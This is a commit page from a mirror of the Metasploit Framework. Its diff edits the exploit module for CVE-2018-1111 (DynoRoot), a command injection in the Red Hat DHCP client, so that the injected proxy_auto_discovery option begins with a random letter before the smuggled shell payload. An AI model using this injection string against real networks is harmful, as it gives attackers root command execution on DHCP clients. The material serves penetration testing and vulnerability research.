infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Randomize the starting letter

GSoC/Meterpreter_Web_Console
Kevin Kirsche 2018-05-18 15:14:40 -04:00
parent 1efa5c4061
commit 6d0c6a7051
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
View File

@ -37,13 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
['AKA', 'DynoRoot'],
['URL', 'https://dynoroot.ninja/'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'PayloadType': 'cmd',
'Payload' =>
{
# 255 for a domain name, minus some room for encoding
'Space' => 200,
'DisableNops' => true,
},
'Targets' => [ [ 'Automatic Target', { }] ],
@ -57,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #")
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(1)}'&#{payload.encoded} #")
begin
while @dhcp.thread.alive?